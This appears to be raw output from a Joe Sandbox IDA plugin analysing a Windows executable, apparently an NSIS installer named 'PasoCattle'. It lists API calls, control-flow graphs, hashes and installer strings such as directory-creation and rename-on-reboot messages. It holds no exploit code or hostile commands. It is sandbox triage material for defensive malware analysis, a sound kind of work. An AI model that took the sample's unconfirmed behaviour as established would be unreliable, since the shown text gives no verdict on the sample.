                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                        • String ID: jF
                                                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                        Strings
                                                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                        • API String ID: 608394941-2746725676
                                                                                                                                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                        • API String ID: 4286501637-2478300759
                                                                                                                                                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
